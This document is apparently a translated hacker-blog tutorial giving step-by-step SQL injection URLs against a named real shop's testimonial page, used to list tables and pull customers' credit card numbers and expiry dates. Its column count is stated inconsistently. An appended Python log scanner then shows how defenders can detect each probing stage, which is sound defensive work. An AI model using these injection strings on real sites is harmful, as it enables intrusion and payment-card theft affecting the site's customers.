1. Find a target
Enter this in Google: inurl:"customer_testimonials.php?&testimonial_id="
Found a target, right?
http://www.countrycreekfarm.com/customer_testimonials.php?testimonial_id=9999

2. Check for the bug: add ' to the end of the URL
http://www.countrycreekfarm.com/customer_testimonials.php?testimonial_id=9999'
If an error message appears ... hehehe ... happy mode on.

3. Add - after = so that we can slip in SQL commands
http://www.countrycreekfarm.com/customer_testimonials.php?testimonial_id=-9999

4. Use order by until you get the error Unknown column 'x' in 'order clause'
http://www.countrycreekfarm.com/customer_testimonials.php?testimonial_id=-9999 order by 1-- <---- no error
http://www.countrycreekfarm.com/customer_testimonials.php?testimonial_id=-9999 order by 2-- <---- no error
http://www.countrycreekfarm.com/customer_testimonials.php?testimonial_id=-9999 order by 3-- <---- no error
http://www.countrycreekfarm.com/customer_testimonials.php?testimonial_id=-9999 order by 4-- <---- no error
http://www.countrycreekfarm.com/customer_testimonials.php?testimonial_id=-9999 order by 5-- <---- no error
http://www.countrycreekfarm.com/customer_testimonials.php?testimonial_id=-9999 order by 6-- <---- no error
http://www.countrycreekfarm.com/customer_testimonials.php?testimonial_id=-9999 order by 7-- <---- no error
http://www.countrycreekfarm.com/customer_testimonials.php?testimonial_id=-9999 order by 8-- <---- no error
http://www.countrycreekfarm.com/customer_testimonials.php?testimonial_id=-9999 order by 9-- <---- error
OK, now we know the site has 7 columns.

4. Now union goes into action; we will find out the column number
http://www.countrycreekfarm.com/customer_testimonials.php?testimonial_id=-9999 union all select 1,2,3,4,5,6,7,8--
OK, the number 6 comes out.

5. Now we peek at the table names
http://www.countrycreekfarm.com/customer_testimonials.php?testimonial_id=-9999 union all select 1,2,3,4,5,table_name,7,8 from information_schema.tables--
Wow, there is an orders table there... nice, nice, nice.

6. Now we peek at its columns
http://www.countrycreekfarm.com/customer_testimonials.php?testimonial_id=-9999 union all select 1,2,3,4,5,column_name,7,8 from information_schema.columns--
OK, you have seen them, right? The targets are:
cc_expires,cc_number,cc_owner,payment_method,cc_type,billing_country,billing_state,billing_postcode,billing_city,billing_street_address,billing_company,billing_name

7. Now we try peeking at cc_expires
http://www.countrycreekfarm.com/customer_testimonials.php?testimonial_id=-9999 union all select 1,2,3,4,5,cc_expires,7,8 from orders--

8. Now we peek at cc_number
http://www.countrycreekfarm.com/customer_testimonials.php?testimonial_id=-9999 union all select 1,2,3,4,5,cc_number,7,8 from orders--

WANT TO KNOW WHAT COMES NEXT? JUST OPEN a-dwisatya.blogspot.com
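
The steps above as they look from the defender's side, as an added example that is not part of the original post: a Python scan of web-server access logs that flags each probing stage against the testimonial_id parameter. The log lines and IP addresses are constructed, and the rule that a valid id is a plain integer is an assumption about the application.

```python
import re
from urllib.parse import urlsplit, parse_qs

PARAM = "testimonial_id"          # parameter name from the walkthrough
STAGES = [                        # most specific first; first match wins
    ("schema_enumeration", re.compile(r"information_schema", re.I)),
    ("union_select", re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I)),
    ("column_count_probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("quote_probe", re.compile(r"['\"]")),
]
REQUEST = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')

def classify(value):
    """Return None for a plain integer id, else the name of the probing stage."""
    if re.fullmatch(r"\d{1,10}", value):      # assumed rule: ids are integers
        return None
    for name, pattern in STAGES:
        if pattern.search(value):
            return name
    return "non_numeric_id"       # e.g. the leading minus sign from step 3

def scan(lines):
    """Return (client_ip, stage) for each request carrying a suspicious id."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        # parse_qs percent-decodes the value and turns '+' into a space
        params = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        for value in params.get(PARAM, []):
            stage = classify(value)
            if stage:
                hits.append((m["ip"], stage))
    return hits

def _line(ip, query):             # builds a constructed combined-format log line
    return (f'{ip} - - [01/Jan/2024:10:00:00 +0000] '
            f'"GET /customer_testimonials.php?{query} HTTP/1.1" 200 512')

SAMPLE_LOG = [                    # constructed sample data, documentation IPs
    _line("198.51.100.7", "testimonial_id=12"),
    _line("203.0.113.5", "testimonial_id=9999%27"),
    _line("203.0.113.5", "testimonial_id=-9999"),
    _line("203.0.113.5", "testimonial_id=-9999%20order%20by%209--"),
    _line("203.0.113.5", "testimonial_id=-9999+union+all+select+1,2,3,4,5,6,7,8--"),
    _line("203.0.113.5", "testimonial_id=-9999+union+all+select+1,2,3,4,5,"
                         "table_name,7,8+from+information_schema.tables--"),
]

if __name__ == "__main__":
    for ip, stage in scan(SAMPLE_LOG):
        print(ip, stage)
```

The same strict integer check, applied in the application before the query is built and combined with a parameterized query, removes the injection point that every step above depends on.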

